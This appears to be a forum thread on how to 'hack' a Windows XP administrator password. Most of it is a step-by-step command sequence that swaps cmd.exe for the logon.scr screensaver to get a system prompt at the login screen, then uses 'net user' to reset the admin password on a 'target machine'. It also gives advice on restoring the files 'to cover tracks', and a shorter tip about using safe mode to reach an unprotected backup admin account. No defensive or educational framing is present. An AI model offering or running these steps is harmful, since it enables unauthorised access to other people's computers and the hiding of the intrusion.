Try booting into safe mode. Usually that brings up the backup Admin account which most people forget to password. Once in there you can change whatever you want.

How to hack windows XP admin password
If you log into a limited account on your target machine and open up a dos prompt then enter this set of commands Exactly:
cd\
cd\windows\system32
mkdir temphack
copy logon.scr temphack\logon.scr
copy cmd.exe temphack\cmd.exe
del logon.scr
rename cmd.exe logon.scr
exit
Now what you have just done is told the computer to backup the command program
and the screen saver file, then edits the settings so when the machine boots the
screen saver you will get an unprotected dos prompt with out logging into XP.
Once this happens if you enter this command minus the quotes
"net user <admin account name here> password"
If the Administrator Account is called Frank and you want the password blah enter this
"net user Frank blah"
and this changes the password on franks machine to "blah" and your in.
Good luck!
p.s: Don't forget to copy the contents of temphack back into the system32 dir to cover tracks. Also, if you cannot rename "cmd.exe" to "logon.scr," you can just go into your cmd and type "net user blah blah blah" and it will still work, just not as well.

How to hack windows XP admin password
Big long complicated directions.
Mine is quicker, easier, and less dangerous to the system should you bugger up something. It's good if you don't have the backup admin account available to you, but if you do, why bother with something risky?

It's fairly unpossible to screw it up, as long as you copy the cmd.exe and logon.scr files back to the sys32 directory.
